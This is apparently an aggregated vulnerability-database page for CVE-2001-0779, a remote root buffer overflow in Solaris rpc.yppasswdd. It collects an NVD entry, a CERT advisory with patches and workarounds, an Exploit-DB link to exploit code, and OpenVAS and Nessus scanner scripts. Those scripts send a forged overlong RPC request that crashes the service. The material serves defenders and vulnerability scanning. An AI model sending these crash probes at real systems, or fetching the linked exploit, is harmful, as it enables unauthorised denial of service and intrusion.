Search...

CVE-2001-0779

2001-10-18T00:00:00

ID CVE-2001-0779
Type cve
Reporter NVD
Modified 2018-05-02T21:29:13

Description

Buffer overflow in rpc.yppasswdd (yppasswd server) in Solaris 2.6, 7 and 8 allows remote attackers to gain root access via a long username.

JSON Vulners Source

Initial Source

{"id": "CVE-2001-0779", "bulletinFamily": "NVD", "title": "CVE-2001-0779", "description": "Buffer overflow in rpc.yppasswdd (yppasswd server) in Solaris 2.6, 7 and 8 allows remote attackers to gain root access via a long username.", "published": "2001-10-18T00:00:00", "modified": "2018-05-02T21:29:13", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0779", "reporter": "NVD", "references": ["http://www.kb.cert.org/vuls/id/327281", "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/209", "http://www.securityfocus.com/archive/1/200110041632.JAA28125@dim.ucsd.edu", "http://www.ciac.org/ciac/bulletins/m-008.shtml", "https://exchange.xforce.ibmcloud.com/vulnerabilities/6629", "http://www.securityfocus.com/archive/1/187086", "http://www.securityfocus.com/bid/2763"], "cvelist": ["CVE-2001-0779"], "type": "cve", "lastseen": "2018-05-06T20:29:32", "history": [{"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:102", "name": "oval:org.mitre.oval:def:102", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:sun:solaris:8.0", "cpe:/o:sun:solaris:7.0::x86", "cpe:/o:sun:solaris:8.0::x86", "cpe:/o:sun:solaris:2.6", "cpe:/o:sun:solaris:7.0", "cpe:/o:sun:solaris:2.6::x86"], "cvelist": ["CVE-2001-0779"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Buffer overflow in rpc.yppasswdd (yppasswd server) in Solaris 2.6, 7 and 8 allows remote attackers to gain root access via a long username.", "edition": 1, "enchantments": {"score": {"modified": "2016-09-03T03:03:36", "value": 7.5, "vector": "NONE"}}, "hash": "28987b10ca0b9dbdf0a11338655a5aa0b55e8d0c941e81a4d86eb413f0e3d8b8", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "034d56135283604fe244a11d930265bd", "key": "references"}, {"hash": "c77ff8770c074bf994c913293f3d228a", "key": "description"}, {"hash": "d1c053162ac295e2e32ec5a7dac5f31f", "key": "modified"}, {"hash": "501e93919b4432b134f14e60d0d08b1c", "key": "cpe"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "02a63aac60b04b02b4f369aca844a89c", "key": "published"}, {"hash": "c6bfdfed648de1d418dabdcaa83c5092", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "979f04926eff059d9d79c4bbdf697def", "key": "scanner"}, {"hash": "637359f2f5579fcd64446a05988b69e4", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b0e2d0afafdb37c4cbb52f173e4fc675", "key": "cvelist"}, {"hash": "36a0f12664ddea753aca8f288f69d243", "key": "assessment"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0779", "id": "CVE-2001-0779", "lastseen": "2016-09-03T03:03:36", "modified": "2008-09-05T16:24:54", "objectVersion": "1.2", "published": "2001-10-18T00:00:00", "references": ["http://www.kb.cert.org/vuls/id/327281", "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/209", "http://www.securityfocus.com/archive/1/200110041632.JAA28125@dim.ucsd.edu", "http://www.ciac.org/ciac/bulletins/m-008.shtml", "http://xforce.iss.net/static/6629.php", "http://www.securityfocus.com/archive/1/187086", "http://www.securityfocus.com/bid/2763"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:102", "name": "oval:org.mitre.oval:def:102", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2001-0779", "type": "cve", "viewCount": 3}, "differentElements": ["references", "assessment", "modified"], "edition": 1, "lastseen": "2016-09-03T03:03:36"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "860d76e38b759bfb338b695f8c61a261"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "501e93919b4432b134f14e60d0d08b1c"}, {"key": "cvelist", "hash": "b0e2d0afafdb37c4cbb52f173e4fc675"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "c77ff8770c074bf994c913293f3d228a"}, {"key": "href", "hash": "637359f2f5579fcd64446a05988b69e4"}, {"key": "modified", "hash": "bfdb21eb96d9960c51c22df0e5741691"}, {"key": "published", "hash": "02a63aac60b04b02b4f369aca844a89c"}, {"key": "references", "hash": "2acad53b16a22c058aa52b1f3dc375a3"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "979f04926eff059d9d79c4bbdf697def"}, {"key": "title", "hash": "c6bfdfed648de1d418dabdcaa83c5092"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "f170ef419b7ee941bc012056963d9cf926f9f6698b561b2c167307f669532738", "viewCount": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2018-05-06T20:29:32"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/o:sun:solaris:8.0", "cpe:/o:sun:solaris:7.0::x86", "cpe:/o:sun:solaris:8.0::x86", "cpe:/o:sun:solaris:2.6", "cpe:/o:sun:solaris:7.0", "cpe:/o:sun:solaris:2.6::x86"], "assessment": {"href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A102", "name": "oval:org.mitre.oval:def:102", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:102", "name": "oval:org.mitre.oval:def:102", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}]}

{"cert": [{"lastseen": "2018-08-31T02:36:41", "references": ["http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=salert%2F27486&zone_32=yppasswd%2A%20%202748%2A%20", "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=salert%2F27486&zone_32=yppasswd%2A%20%202748%2A%20", "http://archives.neohapsis.com/archives/bugtraq/2001-05/0273.html ", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0779", "http://www.incidents.org/news/yppassword.php"], "description": "### Overview\n\nA remotely exploitable buffer overflow exists in the 'rpc.yppasswd' service on Solaris 2.6, 2.7, and 2.8. \n\n### Description\n\nNetwork Information Service (NIS) provides a simple network lookup service consisting of databases and processes. Its purpose is to provide information, that has to be known throughout the network, to all machines on the network. Information likely to be distributed by NIS might be login names and/or group information. A remotely exploitable buffer overflow exists in the 'rpc.yppasswd' service. This vulnerability could allow a remote intruder to execute arbitrary code with superuser privileges on an NIS master server. **Note that only NIS master servers running the rpc.ypasswdd process are affected**. For more information, please see this [Sun Alert](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=salert%2F27486&zone_32=yppasswd%2A%20%202748%2A%20>). \n \n--- \n \n### Impact\n\nRemote intruders can execute arbitrary code with super user privileges on a NIS master server. \n \n--- \n \n### Solution\n\nContact vendor for patches. \n \n--- \n \nIf you cannot immediately patch your systems, the following are suggested workarounds until a patch can be applied: \n\n * Stop the rpc.yppasswd process. Note that by stopping this service, all users in the NIS domain will be unable to change their NIS password. \n * Enable non-executable user program stacks in the kernel by adding the following lines to the NIS servers \"/etc/system\" file:\nset noexec_user_stack = 1 \nset noexec_user_stack_log = 1 \n\n * Note that a subsequent reboot is required after this change. Additionally, you must restart the rpc.yppasswd process. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nSun Microsystems Inc.| | -| 04 Oct 2001 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23327281 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * [http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=salert%2F27486&zone;_32=yppasswd%2A%20%202748%2A%20](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=salert%2F27486&zone_32=yppasswd%2A%20%202748%2A%20>)\n * <http://www.incidents.org/news/yppassword.php>\n * <http://archives.neohapsis.com/archives/bugtraq/2001-05/0273.html>\n\n### Credit\n\nThis document was written by Ian A. Finlay.\n\n### Other Information\n\n * CVE IDs: [CVE-2001-0779](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0779>)\n * Date Public: 05 Jul 2001\n * Date First Published: 04 Oct 2001\n * Date Last Updated: 18 Dec 2002\n * Severity Metric: 31.39\n * Document Revision: 41\n\n", "edition": 4, "reporter": "CERT", "published": "2001-10-04T00:00:00", "title": "Solaris rpc.yppasswdd does not adequately check input allowing users to execute arbitrary code", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2001-0779", "CVE-2001-0779"], "modified": "2002-12-18T00:00:00", "id": "VU:327281", "href": "https://www.kb.cert.org/vuls/id/327281", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T15:11:59", "osvdbidlist": ["567"], "references": [], "edition": 1, "description": "OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun. CVE-2001-0779. Remote exploit for unix platform", "reporter": "metaray", "published": "2001-05-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "exploitdb", "title": "OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0779"], "modified": "2001-05-10T00:00:00", "id": "EDB-ID:20879", "href": "https://www.exploit-db.com/exploits/20879/", "sourceData": "source: http://www.securityfocus.com/bid/2763/info\r\n\r\nThe rpc.yppasswdd server is used to handle password change requests from yppasswd and modify the NIS password file.\r\n\r\nA buffer overrun vulnerability has been discovered in the rpc.yppasswdd utility distributed by multiple vendors. The problem occurs due to insufficient bounds checking before copying remotely-supplied user information into a static memory buffer. As a result, a malicious user may be capable of exploiting this issue to overwrite sensitive locations in memory and thus execute arbitrary code with superuser privileges. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20879.tar.gz", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20879/"}], "canvas": [{"lastseen": "2016-09-25T14:12:57", "references": [], "edition": 1, "description": "**Name**| yppasswdd \n---|--- \n**CVE**| CVE-2001-0779 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| yppasswdd YPPASSWD_UPDATE Stack Overflow \n**Notes**| References: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F27486&zone_32=category%3Asecurity%20yppasswdd \nCVE Name: CVE-2001-0779 \nVENDOR: Sun \nPatch Info: Solaris 2.6 patch 106303-03, Solaris 7 patch 111590-02, Solaris 8 patch 111596-02 \nDate public: 07/05/2001 \nCERT Advisory: http://www.kb.cert.org/vuls/id/327281 \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0779 \nCVSS: 10.0 \n\n", "reporter": "Immunity Canvas", "published": "2001-10-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "canvas", "title": "Immunity Canvas: YPPASSWDD", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0779"], "modified": "2001-10-18T00:00:00", "id": "YPPASSWDD", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/yppasswdd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-12-08T11:41:38", "references": [], "pluginID": "80035", "description": "The remote RPC service 100009 (yppasswdd) is vulnerable\nto a buffer overflow which allows any user to obtain a root\nshell on this host.", "edition": 2, "reporter": "This script is Copyright (C) 2001 Renaud Deraison", "published": "2008-10-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "yppasswdd overflow", "type": "openvas", "naslFamily": "Gain a shell remotely", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0779"], "modified": "2017-12-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=80035", "id": "OPENVAS:80035", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: yppasswdd.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: yppasswdd overflow\n#\n# Authors:\n# Renaud Deraison <deraison@cvs.nessus.org>\n#\n# Copyright:\n# Copyright (C) 2001 Renaud Deraison\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote RPC service 100009 (yppasswdd) is vulnerable\nto a buffer overflow which allows any user to obtain a root\nshell on this host.\";\n\ntag_solution = \"disable this service if you don't use\nit, or contact Sun for a patch\";\n\nif(description)\n{\n script_id(80035);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-10-24 20:15:31 +0200 (Fri, 24 Oct 2008)\");\n script_bugtraq_id(2763);\nscript_cve_id(\"CVE-2001-0779\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n \n name = \"yppasswdd overflow\";\n script_name(name);\n \n \n script_category(ACT_DENIAL);\n \n script_copyright(\"This script is Copyright (C) 2001 Renaud Deraison\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"secpod_rpc_portmap.nasl\");\n script_require_keys(\"rpc/portmap\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\n\nport = get_rpc_port(program:100009, protocol:IPPROTO_UDP);\nif(port)\n{\n if(!safe_checks())\n {\n if(get_port_state(port))\n {\n soc = open_sock_udp(port);\n if(soc)\n {\n #\n # We forge a bogus RPC request, with a way too long\n # argument. The remote process will die immediately,\n # and hopefully painlessly.\n #\n crp = crap(796);\n \n req = raw_string(0x56, 0x6C, 0x9F, 0x6B, \n \t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,\n\t\t 0x00, 0x01, 0x86, 0xA9, 0x00, 0x00, 0x00, 0x01,\n\t\t 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x03, 0x20, 0x80, 0x1C, 0x40, 0x11\n\t\t ) + crp + raw_string(0x00, 0x00, 0x00, 0x02,\n\t\t 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03,\n\t\t 0x61, 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x03,\n\t\t 0x61, 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x02,\n\t\t 0x61, 0x61, 0x00, 0x00);\n send(socket:soc, data:req);\n r = recv(socket:soc, length:4096);\n if(r)\n {\n # if length(r) == 28, then the overflow did succeed. However,\n # I prefer to re-make a call to getrpcport(), that's safer\n # (who knows what exotic yppasswdd can reply ?)\n sleep(1);\n newport = get_rpc_port(program:100009, protocol:IPPROTO_UDP);\n set_kb_item(name:\"rpc/yppasswd/sun_overflow\", value:TRUE);\n if(!newport)\n security_message(port:port, protocol:\"udp\");\n }\n close(soc);\n }\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:35:37", "references": [], "pluginID": "136141256231080035", "description": "The remote RPC service 100009 (yppasswdd) is vulnerable\nto a buffer overflow which allows any user to obtain a root\nshell on this host.", "edition": 6, "reporter": "This script is Copyright (C) 2001 Renaud Deraison", "published": "2008-10-24T00:00:00", "title": "yppasswdd overflow", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Gain a shell remotely", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0779"], "modified": "2018-08-17T00:00:00", "id": "OPENVAS:136141256231080035", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231080035", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: yppasswdd.nasl 11015 2018-08-17 06:31:19Z cfischer $\n# Description: yppasswdd overflow\n#\n# Authors:\n# Renaud Deraison <deraison@cvs.nessus.org>\n#\n# Copyright:\n# Copyright (C) 2001 Renaud Deraison\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.80035\");\n script_version(\"$Revision: 11015 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 08:31:19 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2008-10-24 20:15:31 +0200 (Fri, 24 Oct 2008)\");\n script_bugtraq_id(2763);\n script_cve_id(\"CVE-2001-0779\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n script_name(\"yppasswdd overflow\");\n\n script_category(ACT_DENIAL);\n\n script_copyright(\"This script is Copyright (C) 2001 Renaud Deraison\");\n script_family(\"Gain a shell remotely\");\n script_dependencies(\"secpod_rpc_portmap.nasl\");\n script_require_keys(\"rpc/portmap\");\n script_tag(name:\"solution\", value:\"disable this service if you don't use\n 26 it, or contact Sun for a patch\");\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"summary\", value:\"The remote RPC service 100009 (yppasswdd) is vulnerable\nto a buffer overflow which allows any user to obtain a root\nshell on this host.\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\n\ninclude(\"byte_func.inc\");\n\nport = get_rpc_port(program:100009, protocol:IPPROTO_UDP);\nif(port)\n{\n if(!safe_checks())\n {\n if(get_port_state(port))\n {\n soc = open_sock_udp(port);\n if(soc)\n {\n #\n # We forge a bogus RPC request, with a way too long\n # argument. The remote process will die immediately,\n # and hopefully painlessly.\n #\n crp = crap(796);\n\n req = raw_string(0x56, 0x6C, 0x9F, 0x6B,\n \t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,\n\t\t 0x00, 0x01, 0x86, 0xA9, 0x00, 0x00, 0x00, 0x01,\n\t\t 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x03, 0x20, 0x80, 0x1C, 0x40, 0x11\n\t\t ) + crp + raw_string(0x00, 0x00, 0x00, 0x02,\n\t\t 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03,\n\t\t 0x61, 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x03,\n\t\t 0x61, 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x02,\n\t\t 0x61, 0x61, 0x00, 0x00);\n send(socket:soc, data:req);\n r = recv(socket:soc, length:4096);\n if(r)\n {\n # if length(r) == 28, then the overflow did succeed. However,\n # I prefer to re-make a call to getrpcport(), that's safer\n # (who knows what exotic yppasswdd can reply ?)\n sleep(1);\n newport = get_rpc_port(program:100009, protocol:IPPROTO_UDP);\n set_kb_item(name:\"rpc/yppasswd/sun_overflow\", value:TRUE);\n if(!newport)\n security_message(port:port, protocol:\"udp\");\n }\n close(soc);\n }\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:41:59", "references": ["http://seclists.org/bugtraq/2001/May/269"], "pluginID": "10684", "description": "The remote RPC service 100009 (yppasswdd) is vulnerable to a buffer overflow which allows any user to obtain a root shell on this host.", "edition": 5, "reporter": "Tenable", "published": "2001-05-29T00:00:00", "title": "Solaris rpc.yppasswdd username Remote Overflow", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Gain a shell remotely", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0779"], "modified": "2018-08-07T00:00:00", "cpe": [], "id": "YPPASSWDD.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10684", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10684);\n script_version(\"1.36\");\n script_cvs_date(\"Date: 2018/08/07 16:46:50\");\n script_cve_id(\"CVE-2001-0779\");\n script_bugtraq_id(2763);\n\n script_name(english:\"Solaris rpc.yppasswdd username Remote Overflow\");\n script_summary(english:\"heap overflow through yppasswdd\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote RPC service has a remote root vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote RPC service 100009 (yppasswdd) is vulnerable\nto a buffer overflow which allows any user to obtain a root\nshell on this host.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2001/May/269\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable this service if you don't use it, or contact Sun for a patch\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/05/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/05/29\");\n\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_MIXED_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n script_dependencies(\"rpc_portmap.nasl\");\n script_require_keys(\"rpc/portmap\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"sunrpc_func.inc\");\n\nport = get_rpc_port2(program:100009, protocol:IPPROTO_UDP);\nif(port)\n{\n if(!safe_checks())\n {\n if(get_udp_port_state(port))\n {\n soc = open_sock_udp(port);\n if(soc)\n {\n #\n # We forge a bogus RPC request, with a way too long\n # argument. The remote process will die immediately,\n # and hopefully painlessly.\n #\n crp = crap(796);\n\n req = raw_string(0x56, 0x6C, 0x9F, 0x6B,\n \t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,\n\t\t 0x00, 0x01, 0x86, 0xA9, 0x00, 0x00, 0x00, 0x01,\n\t\t 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x03, 0x20, 0x80, 0x1C, 0x40, 0x11\n\t\t ) + crp + raw_string(0x00, 0x00, 0x00, 0x02,\n\t\t 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03,\n\t\t 0x61, 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x03,\n\t\t 0x61, 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x02,\n\t\t 0x61, 0x61, 0x00, 0x00);\n send(socket:soc, data:req);\n r = recv(socket:soc, length:4096);\n if(r)\n {\n # if length(r) == 28, then the overflow did succeed. However,\n # I prefer to re-make a call to getrpcport(), that's safer\n # (who knows what exotic yppasswdd can reply ?)\n sleep(1);\n newport = get_rpc_port2(program:100009, protocol:IPPROTO_UDP);\n set_kb_item(name:\"rpc/yppasswd/sun_overflow\", value:TRUE);\n if(!newport)\n security_hole(port:port, protocol:\"udp\");\n }\n close(soc);\n }\n }\n }\n else\n {\n if ( report_paranoia < 2 )exit(0);\n set_kb_item(name:\"rpc/yppasswd/sun_overflow\", value:TRUE);\n security_hole(port:port, protocol:\"udp\", extra:\n\"Nessus reports this vulnerability using only information that was\ngathered. Use caution when testing without safe checks enabled.\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "references": [], "edition": 1, "description": "## Vulnerability Description\nThis host is running the 'yppasswd' RPC service. This service handles password change requests and updates the NIS password file. This service contains a buffer overflow that allows an attacker to execute arbitrary code on this host. An attacker can use this to gain access to this host.\n## Technical Description\nChecks for the presence of RPC service 100009 (yppasswdd). If this service is found to be running on the host it is assumed to be vulnerable.\n## Solution Description\nThis RPC service is usually installed on Sun Solaris. Please upgrade to that latest version of 'yppasswd' available from http://www.sun.com/. Sun Solaris 2.6_x86: Sun Patch 106304-03 Sun Solaris 2.6:v: Sun Patch 106303-03 Sun Solaris 7.0_x86: Sun Patch 111591-02 Sun Solaris 7.0: Sun Patch 111590-02 Sun Solaris 8.0_x86: Sun Patch 111597-02 Sun Solaris 8.0: Sun Patch 111596-02\n## Short Description\nThis host is running the 'yppasswd' RPC service. This service handles password change requests and updates the NIS password file. This service contains a buffer overflow that allows an attacker to execute arbitrary code on this host. An attacker can use this to gain access to this host.\n## References:\nOVAL ID: 102\nOVAL ID: 56\nISS X-Force ID: 6629\n[CVE-2001-0779](https://vulners.com/cve/CVE-2001-0779)\nCIAC Advisory: M-008\nCERT VU: 327281\nBugtraq ID: 2763\n", "reporter": "OSVDB", "published": "2001-05-28T00:00:00", "title": "Solaris rpc.yppasswdd username Remote Overflow", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2001-0779"], "modified": "2001-05-28T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:567", "id": "OSVDB:567", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}